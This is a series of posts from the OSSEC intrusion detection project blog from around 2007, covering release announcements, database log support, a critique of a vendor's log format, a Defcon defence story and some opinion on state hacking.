bookmark_borderOSSEC at IT Undeground 2007

OSSEC will be represented at the 2007 IT Underground Conference, in Warsaw(Poland), where I will be speaking about Log-Based Intrusion Detection (using OSSEC of course). It is going to be a hands on, 1 hour presentation, where everyone will be invited to bring their own laptops and actively participate on it. If you live in Poland (or near by), make sure to attend to lean more about LIDS, OSSEC and log analysis.

bookmark_borderDatabase Logging

Next version of OSSEC will come with support for PostgreSQL logs and MySQL error/query logs. Since database logging is not something widely done (and even hard to find documentation about), I started in the OSSEC wiki some sections about it. If you are interested in database log analysis, please check out the following pages and help us improve them:

If you have information about logging on other databases (Oracle, MS SQL, etc), send some information to us so we can add support for them on ossec.

*This alpha version of 1.4 has the database support enabled for anyone interested to test: http://www.ossec.net/files/snapshots/ossec-hids-070930.tar.gz

bookmark_borderChinese hacking and Desinformation warfare

For the last few weeks many articles and news stories were published about the Chinese hacking USA government computers. The reality is that the Chinese have been hacking the US, Russian, Australian (,etc) computers for years, but they are not the only to blame, since the US, Russia and all other countries have been doing the same for a long time.

Why this is news stories now? Richard Bejtlich pointed that it might be for political reasons, but why would a country let the enemy know that they succeeded? Even worse, why would the US air force publish in their own site that the Chinese is the leader in cyber warfare?

That might be a reason… one of the things that I learned from history is that governments use “desinformation warfare” to achieve their goals. My take is that the US gov (and intelligence agencies) setup some honeypots with fake information for the Chinese to hack. The Chinese were successful and now the US gov wants the Chinese to believe that they hacked real information… What’s the best way to make them believe so? Yes, tell the whole world about it..

*Yes, this is not news anymore, but I am still catching up on my reads.
**Sorry for off-topic, back to ossec from now on 🙂

bookmark_borderHow to create a log standard

  1. Get the marketing team together for a clever name.
  2. Copy and paste Microsoft’s IIS W3C log format
  3. Write a press release and tell the world about it

I am not joking, but eIQnetworks released their Open Source Event Logging Standard which fits exactly on my description above. First, they call it “Open Source”. Do they know what open source means? Which OSI approved license did they use? Second, why require a registration to download it? What are they going to do with the information provided? Is it open or not? Lastly, their format is a ugly copy and paste of the Microsoft one. Look at their proposed header:

#Software: eIQ Open Log Format (OLF)
#Version: 1.1
#Date: 02-18-2007 12:14:25 300
#Fields: date time gmt-offset internalIP externalIP virtualdevice..

Look at Microsoft’s:

#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2006-10-09 02:11:51
#Fields: date time c-ip cs-username s-sitename s-computername

I will refrain from commenting further, but you can take a look at it: Open Log Format.

Update 1:Anton Chuvakin and Raffael Marty reviewed their “standard”: chuvakin.blogspot and raffy.ch.

bookmark_borderWeb attacks resource

I have a few honeypots out there just collecting information about web attacks and they have been great to help me improve OSSEC and how it parses web/proxy logs. Since I couldn’t find any public resource dedicated to store this kind of information, I decided to create one at the OSSEC wiki to keep track of them. It is all manual right now, but I plan to automate a lot of work to keep the page current.

I have a few entries with sites storing php/perl bots, common attack patterns, copies of the tools used, etc. If you want to help out keeping it updated, let me know. If you want to share your logs (from real servers or honeypots), it would be great too..

More info: Web attacks links

bookmark_borderOSSEC at the “Own the Box” competition

Paul Ziegler (tatsumori) sent me a very interesting e-mail explaining how he used OSSEC to protect his box at the Defcon’s 15 “Øwn the box” competition.

During Defcon15 there was a new kind of contest called the “Øwn the box” competition where anyone who 0wned a box got to take it home. I was over there as a speaker so I thought it might be fun to try defending a box. My box was based on Gentoo-Linux and hardened using various techniques…

So the results were recently published on the DC-Homepage (http://defcon.org/) – and if you look closely there is this line saying “Most evil entry: Tatsumori (Gentoo Hardened with arp poisoning evilness)” The arp-foo was actually done using scapy, but I scripted it as an active response for OSSEC 1.2. So part of my success to survive there (and really make people curse out while hacking) is OSSEC.

It’s great modularity and easy extensibility makes creating kick-ass crazy dedicated solutions so much easier then it was ever before.

He also posted some information at his blog. Very cool stuff Paul!

bookmark_borderBruce Schneier on log analysis

We all respect Bruce Schneier’s opinion (if you don’t be careful) and I found very interesting his take on log analysis:

Whenever someone attacks you, they leave footprints… All of these products have audit logs and they produce audit messages (Millions of messages a day). Most of them are a complete waste of time, like printer out of toner. So what?

But some of them are very important. In those audit logs are footprint of attacks. If you can monitor those on real time you can watch the attacker as he is attacking. If you can understand what is going on fast enough, you can kick him out before he does more damage…

You can watch it here.

bookmark_borderCool ossec logo/mascot

James Throgmorton sent to me a very cool mascot that he did for ossec. It is based on the 300 movie and looking pretty good.

OSSEC - 300

I was also playing with IMG2TXT and it is generating some very good ascii-based logos for ossec. Check out one example here.

On a side note, RichM fromEthical Hacker posted a “Quick and dirty tutorial on getting OSSEC, the open source IDS that’s #2 on insecure.org, running on the Business Card ISO of Debian. Now go out there and start keeping an eye on your network.” .. Good stuff!

bookmark_borderOSSEC v1.3 released

We are pleased to announce the general availability of OSSEC version 1.3.
This is one of our biggest releases so far, our first under the GPLv3, with numerous new features and bug fixes.

This new version comes with the following major new features:

  • User interface to manage the Windows Agent. Screenshots here.
  • Support for Courier pop3/imapd logs. samples here.
  • Support for Cisco IOS logs.
  • Support for Symantec Web Security logs.
  • Support for SMF-SAV Sendmail filter logs.
  • Chinese Translation of the installation script.
  • Support for host-based policy monitoring/enforcement on Windows systems. More information here.

Check the v1.3 changelog to check all changes and contributors.

Special thanks to Michael Starks, Brian Wang, Serge Dubrouski, Logan O’Sullivan Bruns and Dave Lowe for the contributions and Dennis Borkhus-Veto, John Ives and Liliane Cid for beta testing this release.

Download it in here.

Official announcement in here.